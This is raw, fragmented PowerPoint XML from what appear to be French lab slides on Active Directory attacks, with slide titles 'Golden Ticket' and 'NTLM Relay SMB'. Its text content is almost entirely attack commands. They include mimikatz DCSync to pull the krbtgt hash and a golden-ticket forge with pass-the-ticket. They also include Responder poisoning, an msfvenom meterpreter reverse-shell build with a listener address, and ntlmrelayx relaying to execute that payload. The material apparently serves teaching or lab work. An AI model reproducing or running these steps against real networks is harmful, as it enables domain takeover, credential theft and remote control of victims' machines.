          <p:cNvPr id="8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3AC7F8D3-7458-8B08-05C0-381E2F3AF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282" y="714477"/>
            <a:ext cx="5029835" cy="4572635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BB26FF0-0896-FA44-66B6-780023D52B0E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-4677514" y="2220408"/>
            <a:ext cx="4545686" cy="2827600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C:\Users\WINATK\Downloads\mimikatz_trunk\x64</a:t>
            </a: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.\mimikatz.exe</a:t>
            </a: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lsadump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::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dcsync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/user :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krbtgt</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="9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" name="Image 9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B16014B4-8C5F-17C8-59C8-9A3BDEEEE5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063" y="2329283"/>
            <a:ext cx="641350" cy="2032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F189C24-CD30-DD88-BB64-52B01B01E6E0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="318559" y="1899953"/>
            <a:ext cx="4545686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whoami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/user</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="9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Image 2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F6D725DB-C607-8C70-2F84-41EB93AADC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41" y="2000431"/>
            <a:ext cx="641350" cy="203200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4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E343EFE5-6AE4-90D7-F680-F39390269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39" y="2835698"/>
            <a:ext cx="4505325" cy="13335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E89E462-7351-FC5B-1AFC-1A6970CFB275}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="318559" y="4242286"/>
            <a:ext cx="4545686" cy="94347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klist</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="11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dir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\\DC-PARENT\C$`</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Image 5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F1B26738-B262-4C13-E003-9DACC1C9E1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59" y="4275870"/>
            <a:ext cx="641350" cy="203200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Picture 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66D194-99B4-E02D-AB63-01897B4ED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78" y="5258849"/>
            <a:ext cx="4545686" cy="1507713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F51148A-3A6F-3335-EA16-411BB61B3688}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6203864" y="478925"/>
            <a:ext cx="5384800" cy="812363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kerberos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::golden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domain:sad.corp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sid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:[SID_RECUPERE] /rc4:[HASH_NTLM_KRBTGT]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user:AtckAdmin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/id:500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ptt</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="11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3" name="Image 12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43B89A88-032D-D7D5-4CFF-DEACA7C8A6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14" y="511277"/>
            <a:ext cx="641350" cy="203200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14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5CC3AD42-158C-4ED3-5CE7-48A2432F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616" y="1367045"/>
            <a:ext cx="5760720" cy="2050415"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="15" name="Picture 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5BD1384C-0395-A16F-DAB7-210AEFB04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285" y="3502448"/>
            <a:ext cx="5150051" cy="3111489"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="16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19746CC-C845-C522-0517-F15A7DD64D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5" t="-62" r="1582" b="1241"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3112777" y="737392"/>
            <a:ext cx="5654040" cy="5445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F6894AE-D089-BDAA-698A-FA810D795E0F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-5161663" y="478925"/>
            <a:ext cx="5029835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 SMB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218548F-A429-9840-579D-A792B4EB9A1A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-4737859" y="1705372"/>
            <a:ext cx="4545686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2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nano /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="12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usr</a:t>
            </a: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/share/responder/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="12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Responder.conf</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="6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EB53B74-995B-3692-B5E3-E1B7FFEC96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072007"/>
            <a:ext cx="5760720" cy="2800350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CB72268-48B2-9292-07E9-90E19000393A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12510991" y="-17903"/>
            <a:ext cx="4545686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responder -I eth0 -v</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="14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26D24AF-D835-FD18-0B0F-F1D8ACF582E7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12731717" y="1160661"/>
            <a:ext cx="6015478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msfvenom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-p windows/x64/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meterpreter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reverse_tcp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LHOST=192.168.229.152 LPORT=6969 -f exe -o reverse-shell.exe</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="10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2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A6D076B-9011-F863-9F42-34EDAED6E6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4950" y="-1156718"/>
            <a:ext cx="5760720" cy="819785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BAC4CB8-FF4F-150A-DADC-7D83581B7666}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12731717" y="3417460"/>
            <a:ext cx="5801080" cy="1443696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python3 ntlmrelayx.py -t 192.168.229.146 -e /home/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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rel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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/reverse-shell.exe</a:t>
            </a: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fr-FR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msfconsole</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="12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4" name="Picture 1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9A4FA525-8469-085B-1122-E6587D3EB3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31717" y="5528982"/>
            <a:ext cx="5629910" cy="914400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="25" name="Image 24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6C80DFE3-9FF6-919C-C783-7C4FEE3886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672" y="1738161"/>
            <a:ext cx="641350" cy="203200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="26" name="Image 25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7FCB2883-291C-B7BE-4B85-383DA7A37D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327" y="54528"/>
            <a:ext cx="641350" cy="203200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="27" name="Image 26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C258501C-2C24-089D-ED99-C7388B2F23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103" y="1184822"/>
            <a:ext cx="641350" cy="203200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="29" name="Image 28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8D1A4EDB-4B04-7FD8-49FA-1500F88BBD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058" y="3459954"/>
            <a:ext cx="641350" cy="203200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="30" name="Image 29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5521C467-956F-F533-917C-8118D3FBCE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890" y="2462431"/>
            <a:ext cx="64135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0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B110F58-9FD0-CBBE-7EDF-0FD7EF4A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0" y="7446435"/>
            <a:ext cx="5760720" cy="480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80AF48E-1B86-1041-402C-7F7506EA6FEE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="475789" y="-1565818"/>
            <a:ext cx="4297481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Golden Ticket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pic>
        <p:nvPicPr>
          <p:cNvPr id="8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3AC7F8D3-7458-8B08-05C0-381E2F3AF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282" y="714477"/>
            <a:ext cx="5029835" cy="4572635"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Image 9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B16014B4-8C5F-17C8-59C8-9A3BDEEEE5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063" y="2329283"/>
            <a:ext cx="641350" cy="2032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F189C24-CD30-DD88-BB64-52B01B01E6E0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-5123894" y="1823926"/>
            <a:ext cx="4545686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whoami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/user</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="9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Image 2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F6D725DB-C607-8C70-2F84-41EB93AADC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432" y="1823926"/>
            <a:ext cx="641350" cy="203200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4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E343EFE5-6AE4-90D7-F680-F39390269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03713" y="2848446"/>
            <a:ext cx="4505325" cy="13335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E89E462-7351-FC5B-1AFC-1A6970CFB275}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-5144074" y="4181946"/>
            <a:ext cx="4545686" cy="943475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klist</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="11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dir</a:t>
            </a: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\\DC-PARENT\C$`</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Image 5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F1B26738-B262-4C13-E003-9DACC1C9E1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738" y="4223918"/>
            <a:ext cx="641350" cy="203200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Picture 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66D194-99B4-E02D-AB63-01897B4ED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44074" y="5350783"/>
            <a:ext cx="4545686" cy="1507713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F51148A-3A6F-3335-EA16-411BB61B3688}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6054236" y="-1299468"/>
            <a:ext cx="5384800" cy="812363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kerberos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::golden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domain:sad.corp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sid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:[SID_RECUPERE] /rc4:[HASH_NTLM_KRBTGT]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user:AtckAdmin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/id:500 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ptt</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="11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3" name="Image 12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43B89A88-032D-D7D5-4CFF-DEACA7C8A6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686" y="-1299468"/>
            <a:ext cx="641350" cy="203200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14" name="Picture 1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5CC3AD42-158C-4ED3-5CE7-48A2432F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2216" y="798718"/>
            <a:ext cx="5760720" cy="2050415"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="15" name="Picture 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5BD1384C-0395-A16F-DAB7-210AEFB04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8066" y="3394612"/>
            <a:ext cx="5150051" cy="3111489"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="16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19746CC-C845-C522-0517-F15A7DD64D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5" t="-62" r="1582" b="1241"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3092596" y="7125759"/>
            <a:ext cx="5654040" cy="5445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507FC87-3008-8266-B439-C8C37DEDE7C7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="258644" y="126187"/>
            <a:ext cx="5029835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 SMB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0F7DD424-7E64-9657-A0C3-BAE6AF2324AB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="351686" y="1673824"/>
            <a:ext cx="4545686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2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nano /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="12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usr</a:t>
            </a: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/share/responder/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="12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Responder.conf</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="6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263059C-B3BE-C58D-C4B8-B1AABDCE57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158" y="2633404"/>
            <a:ext cx="5760720" cy="2800350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74C970-7CF3-52BC-E919-686B5A05A648}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5919616" y="285147"/>
            <a:ext cx="4545686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responder -I eth0 -v</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="14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17879BD-EFEB-9564-2E48-2BD02513938D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5917878" y="1276043"/>
            <a:ext cx="6015478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msfvenom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-p windows/x64/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meterpreter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reverse_tcp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LHOST=192.168.229.152 LPORT=6969 -f exe -o reverse-shell.exe</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="10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2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E503900C-1364-C71F-DD09-0AC99853C4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5235" y="2329283"/>
            <a:ext cx="5760720" cy="819785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7E48579-AE62-AA51-CF8E-3E1144E0AFB2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6204875" y="3279603"/>
            <a:ext cx="5801080" cy="1443696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python3 ntlmrelayx.py -t 192.168.229.146 -e /home/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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rel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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/reverse-shell.exe</a:t>
            </a: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fr-FR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msfconsole</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="12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4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46678AF-3BCE-DAEA-BCC9-CC5C2DB2F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678713" y="1696318"/>
            <a:ext cx="4524375" cy="4580890"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="25" name="Picture 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D87201-373A-7098-5B15-7870EBD50A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0876" y="-5720859"/>
            <a:ext cx="5760720" cy="1485900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2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ECA5C17-35A4-19B1-4D11-F4FB25516D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6383" y="-4074621"/>
            <a:ext cx="3168987" cy="3249679"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="27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0BACB4BB-E9C6-E5FD-DD9D-1C30C93DDB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56050" y="2127821"/>
            <a:ext cx="4286312" cy="2525862"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="29" name="Picture 1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3A2D1323-AFD5-6C10-7A33-9912C7716D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16625" y="5487621"/>
            <a:ext cx="5629910" cy="914400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="30" name="Image 29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C9C00028-0E48-4511-69C6-394F70636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57" y="1722326"/>
            <a:ext cx="641350" cy="203200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="31" name="Image 30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7F6242E5-41C0-2F88-3821-EEBF89161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869" y="354379"/>
            <a:ext cx="641350" cy="203200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="32" name="Image 31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BF81DAF7-26B9-65F1-4809-5267A78624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006" y="1300938"/>
            <a:ext cx="641350" cy="203200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="33" name="Image 32" descr="Une image contenant Graphique, Caractère coloré, cercle, symbole&#10;&#10;Description générée automatiquement">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CE0B7EF9-CE07-E9EE-D753-79BB85564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680" y="3327400"/>
            <a:ext cx="64135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24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680634" y="6922055"/>
            <a:ext cx="4808220" cy="2670832"/>
            <a:chOff x="460896" y="117406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60896" y="117406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886" y="12346418"/>
              <a:ext cx="3715567" cy="3116171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31635" y="15564714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2198143" y="357488"/>
            <a:ext cx="7795713" cy="5945756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Montserrat" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Méthode</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr-FR" sz="2800" dirty="0">
                <a:latin typeface="Montserrat" pitchFamily="2" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="fr-FR" sz="48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sz="2800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37011" y="7739681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691890" y="-2018000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728085" y="959288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2730571" y="26555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2802960" y="5059681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240780" y="9592888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547" y="5251175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69" y="-1477850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33405" y="640950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266637" y="9678726"/>
            <a:ext cx="1327005" cy="13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6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507FC87-3008-8266-B439-C8C37DEDE7C7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="258644" y="126187"/>
            <a:ext cx="5029835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 SMB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0F7DD424-7E64-9657-A0C3-BAE6AF2324AB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-5325214" y="1705372"/>
            <a:ext cx="4545686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2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nano /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="12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usr</a:t>
            </a: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/share/responder/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="12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Responder.conf</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="6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263059C-B3BE-C58D-C4B8-B1AABDCE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7501" y="2845418"/>
            <a:ext cx="5760720" cy="2800350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74C970-7CF3-52BC-E919-686B5A05A648}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5729116" y="-1505553"/>
            <a:ext cx="4545686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responder -I eth0 -v</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="14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17879BD-EFEB-9564-2E48-2BD02513938D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12369478" y="1136343"/>
            <a:ext cx="6015478" cy="858659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msfvenom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-p windows/x64/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meterpreter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en-US" sz="1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reverse_tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1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LHOST=192.168.229.152 LPORT=6969 -f exe -o reverse-shell.exe</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="10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2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E503900C-1364-C71F-DD09-0AC99853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478" y="2435525"/>
            <a:ext cx="5760720" cy="819785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7E48579-AE62-AA51-CF8E-3E1144E0AFB2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12369478" y="3381203"/>
            <a:ext cx="5801080" cy="1443696"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="242424"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="189260" dist="38100" dir="5400000" sx="102982" sy="102982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2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en-US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en-US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python3 ntlmrelayx.py -t 192.168.229.146 -e /home/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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rel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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/reverse-shell.exe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marR="4064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fr-FR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$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR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sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0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rgbClr val="D8DEE9"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49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msfconsole</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF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31F0970-0F98-335F-18EC-93A78EA07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44" y="1604389"/>
            <a:ext cx="4524375" cy="4580890"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="24" name="Picture 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5A9941-C722-7D5F-C77C-CA6253F53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888" y="219472"/>
            <a:ext cx="5760720" cy="1485900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="25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7FE472C-4104-FA9B-9DBB-92D3B9398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625" y="1995002"/>
            <a:ext cx="3168987" cy="3249679"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="26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45E78EF9-AF9F-B36B-6F35-8FF53760C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988" y="1992379"/>
            <a:ext cx="4286312" cy="2525862"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="27" name="Picture 1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93336954-57E7-BF0B-963B-69DAEF2F9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6625" y="5487621"/>
            <a:ext cx="5629910" cy="914400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="30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8E5C8E-D6EE-C935-6602-26EB464E5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644" y="-2235551"/>
            <a:ext cx="5760720" cy="2021840"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="31" name="Picture 1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2733B79-F26B-2CE3-0F26-E5F2EF2DF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787665" y="3894834"/>
            <a:ext cx="5760720" cy="1381760"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="32" name="Picture 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D74F222-F287-9DD7-9906-E8320E1509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7106" y="-52085"/>
            <a:ext cx="5760720" cy="1794510"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="33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41BC084-7BDE-B843-DE8F-3F55D79643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08598" y="2128422"/>
            <a:ext cx="5760720" cy="1030605"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="34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41948B2-F8D2-BE33-E995-D06C682F98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6562" y="7453394"/>
            <a:ext cx="5391785" cy="2638425"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="35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B771893-A694-BBE7-847B-DA4FA818EC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4280" y="-7084754"/>
            <a:ext cx="3199460" cy="58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48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507FC87-3008-8266-B439-C8C37DEDE7C7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="258644" y="126187"/>
            <a:ext cx="5029835" cy="134506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Attaque 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NTLM Relay SMB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pic>
        <p:nvPicPr>
          <p:cNvPr id="9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31F0970-0F98-335F-18EC-93A78EA0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26156" y="1471249"/>
            <a:ext cx="4524375" cy="4580890"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="24" name="Picture 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5A9941-C722-7D5F-C77C-CA6253F53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388" y="-1774428"/>
            <a:ext cx="5760720" cy="1485900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="25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7FE472C-4104-FA9B-9DBB-92D3B939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625" y="7229451"/>
            <a:ext cx="3168987" cy="3249679"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="26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45E78EF9-AF9F-B36B-6F35-8FF53760C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188" y="1995002"/>
            <a:ext cx="4286312" cy="2525862"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="27" name="Picture 1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93336954-57E7-BF0B-963B-69DAEF2F9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625" y="10479130"/>
            <a:ext cx="5629910" cy="914400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4F6B88-8F54-8343-5F80-1260AFF7C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68" y="1739854"/>
            <a:ext cx="5760720" cy="2021840"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 1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181B461-D9C4-A0F1-F143-7921CE70E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168" y="4030682"/>
            <a:ext cx="5760720" cy="1381760"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 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FF5FE788-FABD-F429-9050-D6FF5BC05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848" y="211231"/>
            <a:ext cx="5760720" cy="1794510"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5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5C18244-D1F5-C031-D48F-E4092D0BC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5848" y="2148624"/>
            <a:ext cx="5760720" cy="1030605"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6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ED28D61-B67D-3943-FDD6-60ADE42CC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7047" y="3335593"/>
            <a:ext cx="5391785" cy="2638425"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
